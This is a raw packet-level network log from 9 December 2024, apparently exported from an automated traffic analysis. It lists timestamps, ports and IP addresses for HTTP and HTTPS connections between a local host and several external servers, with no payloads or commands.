                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.454260111 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.454437017 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.454701900 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.454755068 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.454755068 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.455087900 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.455251932 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.455878973 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.455965042 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.456691980 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.456804037 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.457524061 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.457596064 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.457850933 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.457889080 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.458406925 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.458556890 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.458597898 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.459340096 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.459461927 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.459506035 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.460186005 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.460376024 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.460432053 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.461100101 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.461215973 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.461431980 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.461919069 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.461935997 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.462024927 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.462802887 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.462924004 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.463735104 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.463821888 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.464545012 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.464644909 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.465445995 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.465620041 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.466314077 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.466480970 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.467104912 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.467153072 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.467175007 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.467456102 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.467560053 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.468161106 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.468466043 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.468877077 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.468899965 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.468982935 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.469770908 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.469822884 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.469882011 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.470630884 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.470833063 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.471635103 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.471836090 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.472372055 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.472537041 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.473263025 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.473376036 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.474124908 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.474287033 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.474523067 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.474896908 CET4987980192.168.2.434.107.221.82
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.474992990 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.475111008 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.475871086 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.475928068 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.476741076 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.476752996 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.476804972 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.477592945 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.477644920 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.477757931 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.478333950 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.478457928 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.478569031 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.478893995 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.479348898 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.479479074 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.479630947 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.480212927 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.480346918 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.481103897 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.481185913 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.482023954 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.482089043 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.482848883 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.482955933 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.483714104 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.483905077 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.483927011 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.484698057 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.484801054 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.485450983 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.485595942 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.486078024 CET49895443192.168.2.434.117.188.166
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.486097097 CET4434989534.117.188.166192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.486314058 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.486396074 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.487221003 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.487324953 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.488069057 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.488203049 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.488964081 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.489051104 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.489136934 CET4989680192.168.2.434.107.221.82
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.489662886 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.489844084 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.489897966 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.489989996 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.490045071 CET49895443192.168.2.434.117.188.166
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.490047932 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.490685940 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.490746021 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.491579056 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.491692066 CET49895443192.168.2.434.117.188.166
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.491699934 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.491703033 CET4434989534.117.188.166192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.491831064 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.492074966 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.492419004 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.492470026 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.492516994 CET8049893185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.492652893 CET8049874185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.492705107 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.492762089 CET4987480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.492772102 CET4989380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.493289948 CET4989380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.493316889 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.493387938 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.493653059 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.494177103 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.494364023 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.494869947 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.495105982 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.495117903 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.495425940 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.495910883 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.495976925 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.496784925 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.496831894 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.497642994 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.497705936 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.498492956 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.498565912 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.499418974 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.499553919 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.500273943 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.500344038 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.500444889 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.501140118 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.501252890 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.502151966 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.502332926 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.502608061 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.502655983 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.502892017 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.503010035 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.503047943 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.503789902 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.503930092 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.504085064 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.504625082 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.504730940 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.504770994 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.505480051 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.505570889 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.505606890 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.506386042 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.506534100 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.506578922 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.507252932 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.507385015 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.507426023 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.508150101 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.508234978 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.508274078 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.508991003 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.509129047 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.509171009 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.509880066 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.509970903 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.510015965 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.510710001 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.510966063 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.511017084 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.511739969 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.511853933 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.511895895 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.512506008 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.512597084 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.512638092 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.513312101 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.513432980 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.513478041 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.514203072 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.514305115 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.514357090 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.515070915 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.515227079 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.515274048 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.515969992 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.516081095 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.516122103 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.516798973 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.516917944 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.516958952 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.517695904 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.517796040 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.517838001 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.518548012 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.518706083 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.518744946 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.519439936 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.519572973 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.519617081 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.520292044 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.520405054 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.520447016 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.521157026 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.521500111 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.521547079 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.522123098 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.522347927 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.522392988 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.522912979 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.523083925 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.523124933 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.523816109 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.523958921 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.523999929 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.524667978 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.524774075 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.524815083 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.546468019 CET804989234.107.221.82192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.589191914 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.594469070 CET804987934.107.221.82192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.594655037 CET4987980192.168.2.434.107.221.82
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.608393908 CET804989634.107.221.82192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.608520031 CET4989680192.168.2.434.107.221.82
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.608695984 CET4989680192.168.2.434.107.221.82
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.612636089 CET8049893185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.643775940 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.727869987 CET804989634.107.221.82192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.080365896 CET49897443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.080391884 CET44349897104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.080931902 CET49897443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.081264973 CET49897443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.081276894 CET44349897104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.213536978 CET4434988934.160.144.191192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.214716911 CET49889443192.168.2.434.160.144.191
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.219383955 CET49889443192.168.2.434.160.144.191
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.219393969 CET4434988934.160.144.191192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.219573975 CET4434988934.160.144.191192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.221412897 CET49889443192.168.2.434.160.144.191
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.221512079 CET4434988934.160.144.191192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.221534014 CET49889443192.168.2.434.160.144.191
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.221538067 CET4434988934.160.144.191192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.221868992 CET49898443192.168.2.434.160.144.191
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.221911907 CET4434989834.160.144.191192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.222673893 CET49889443192.168.2.434.160.144.191
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.222675085 CET49889443192.168.2.434.160.144.191
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.222685099 CET49889443192.168.2.434.160.144.191
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.222728014 CET49898443192.168.2.434.160.144.191
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.222893953 CET49898443192.168.2.434.160.144.191
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:45.222908974 CET4434989834.160.144.191192.168.2.4
